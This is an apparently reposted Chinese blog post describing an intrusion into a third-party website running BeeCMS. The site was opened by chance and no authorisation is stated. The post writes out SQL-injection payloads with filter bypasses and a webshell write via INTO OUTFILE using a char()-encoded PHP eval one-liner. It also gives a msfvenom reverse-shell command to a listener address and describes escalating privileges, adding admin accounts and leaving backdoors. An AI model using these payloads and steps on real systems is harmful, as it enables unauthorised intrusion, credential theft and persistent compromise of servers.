<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    記一次小網站滲透過程

    VSole2022-04-27 06:18:38

    一、序言

    記錄某一次無意點開的一個小網站的滲透過程,幸運的是搭建平臺是phpstudy,cms是beecms,beecms有通用漏洞,然后去網上找了資料,成功getshell并獲取服務器權限。

    二、滲透過程

    1. 無意點開一個網站,發現網站比較小,且看起來比較老,然后發現logo沒有改,于是乎去百度搜索這個cms,發現有通用漏洞,這里貼一個鏈接:Beecms 通用漏洞(https://link.csdn.net/?target=https%3A%2F%2Fwww.ohinge.cn%2Fphp%2Fbeescms_sqli.html)

    2. 這里運氣比較好,沒有更改后臺地址,還是默認地址/admin/login.php

    3. 通過通用漏洞發先后臺管理處存在sql注入漏洞,直接輸入admin’,然后就會報錯,這里用萬能密碼不能登陸,看來還是得通過上面得通用漏洞來進行注入

    4. 可以看到輸入payload后,頁面返回正常,從而可以判斷有sql注入,這里采用雙寫進行繞過

    、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、

    5. 發現這個注入點后,就有各種各樣的注入方式了,通過sql語句寫入一句話,sqlmap一把梭,手工注入得到賬號密碼等等,怎么方便怎么來,這里我把幾種方法都寫一下,看看那種方法可以

    方法一

    1.通過post抓包sqlmap一把梭,dump出管理員賬號密碼,進后臺找上傳點

    2.一把梭,發現并沒有,使用腳本也沒有繞過

    方法二

    1.通過burp抓包,寫入一句話,payload:admin%27 un union ion selselectect 1,2,3,4, into outfile 'xm.php'#,發現寫入失敗,前面講到有防護,這里通過hex編碼或者char函數繞過

    2.對shell部分進行編碼

    3.寫入shell的payload為:注意:記得在編碼轉換的時候前面加0x或者直接用unhex函數,但是本次實驗用unhex函數一直失敗,所以在前面加0x,看到可以寫入成功。

    ps:這里的寫入路徑純屬盲猜,運氣好,默認目錄

    4.用蟻劍連接,成功連接,至此getshell完畢,下來就是后滲透階段,后面會講

    char函數繞過:mysql內置函數char()可以將里面的ascii碼轉換為字符串,payload為:admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#


    一樣成功寫入

    1.寫入成功后,菜刀可以連接,我們訪問寫入的文件,驚奇的發現竟然有admin,和一串md5碼,大膽猜測可能是后臺賬號和密碼,試一下

    2.md5解密,wocao,成功登陸,然后就是后臺找上傳了

    三、后滲透

    通過whoami查看權限,發現是admin權限,但是不是最高權限,我們要提到最高權限去


    方法一

    1.通過msf生成木馬提權,payload:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe2.通過蟻劍上傳木馬,并執行。執行之前打開msf使用模塊use exploit/multi/handler,設置相應參數,然后開始監聽

    2.不知道什么問題,用這個沒有成功,那么只能通過大馬提權了

    方法二

    1.上傳大馬,此處應該有狗或者盾之類的,用的免殺,成功上傳

    2.訪問大馬

    3.這里提權方式很多,就不細說了,有大馬之后很多操作都可以引刃而解了,開放端口,添加賬號,留后門。。等等

    4.創建admin權限賬號之后,登陸服務器

    四、一些其他的發現

    通過掃描目錄,還發現有phpmyadmin,可以爆破,這里我試了下竟然是弱口令,都是root,但是連接不上,只能通過phpmyadmin登陸,發現是低版本的phpstudy搭建的,這里就可以另一種思路,利用日志文件寫入一句話getshell

    五、總結

    1.前臺sql注入獲取用戶名密碼,進入后臺找上傳

    2.SQL注入語句寫入一句話

    3.phpmyadmin一句話getshell

    4.上傳大馬提權

    至此,滲透結束。

    payloadadmin
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    記一次網站滲透過程
    2022-09-13 08:37:27
    前幾天記錄某一次無意點開的一個小網站的滲透過程,幸運的是搭建平臺是phpstudy,cms是beecms,beecms有通用漏洞,然后去網上找了資料,成功getshell并獲取服務器權限。
    一、序言 記錄某一次無意點開的一個小網站的滲透過程,幸運的是搭建平臺是phpstudy,cms是beecms,beecms有通用漏洞,然后去網上找了資料,成功getshell并獲取服務器權限。 二、滲透過程 1. 無意點開一個網站,發現網站比較小,且看起來比較老,然后發現logo沒有改,于是乎去百度搜索這個cms,發現有通用漏洞,這里貼一個鏈接:Beecms 通用漏洞(https://lin
    接著是read_password函數,與read_name函數基本一致。在看最后的password_checker()前,我們用正確密碼測試文件,顯示段錯誤。查看password_checker,login與admin的密碼比較后,來了個奇葩的有毒打印,接著前面的二級函數終于被調用了。我們需要知道報錯原因,gdb調試發現正好是二級指針調用出錯。利用思路經過上面的初步分析,我們知道程序在password_checker中調用一個二級指針失敗而段錯誤終止,考慮到canary的存在,srop不可能短期實現。即使我們無法利用這個二級指針getshell,它的存在也會讓程序終止。
    Jwtear是一款模塊化的命令行工具,該工具可以幫助廣大研究人員從安全研究的角度來解析、創建和修改JSON Web令牌。?完整的模塊化組件:所有的命令都是插件,可以輕松添加新的插件;支持JWS和JWE令牌;提供了易于使用的接口和模版;高靈活性,輕松可擴展新功能;基于生產類庫的令牌生成機制。
    Jenkins漏洞利用復現
    2021-11-17 08:08:12
    也可以利用powershell 或者python腳本反彈shell二、CVE-2018-1000861?exploit.py這里要注釋下,如果你使用代理的話可以添加,這里只是復現,用不到?另外一個linux寫shell的小技巧:echo base64后的木馬內容 |base64 -d > 1.js. jsp生成成功四、
    某CMS漏洞合集
    2023-06-27 16:12:06
    2)contorl.php:對$_GET進行全局過濾危險的SQL函數。這個過濾從最簡單的角度來說,即mysql<8的情況下,把select禁用了,其實就沒辦法進行跨表查詢,SQL利用造成危害的可能性會大大降低,當然這是一種直接且無需考慮用戶體驗為原則的暴力做法,點到為止吧。回到web_inc.php,繼續閱讀,后面吸引我的地方,在于 89 line一處SQL語句的地方。
    環境搭建1.項目介紹:本次項目模擬滲透測試人員在授權的情況下,對目標進行滲透測試,從外網打點到內網橫向滲透,最終獲取整個內網權限。使用弱口令和暴力破解,沒有爆破出弱口令用戶。
    前 言 歡迎各位大佬們給該項目點一個star https://github.com/flipped-aurora/gin-vue-admin/
    關于遠程代碼執行的常用Payload大家好,我是 Ansar Uddin,我是來自孟加拉國的網絡安全研究員。這是我的第二篇 Bug 賞金文章。今天的話題都是關于 Rce 的利用。攻擊者的能力取決于服務器端解釋器的限制。在某些情況下,攻擊者可能能夠從代碼注入升級為命令注入。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类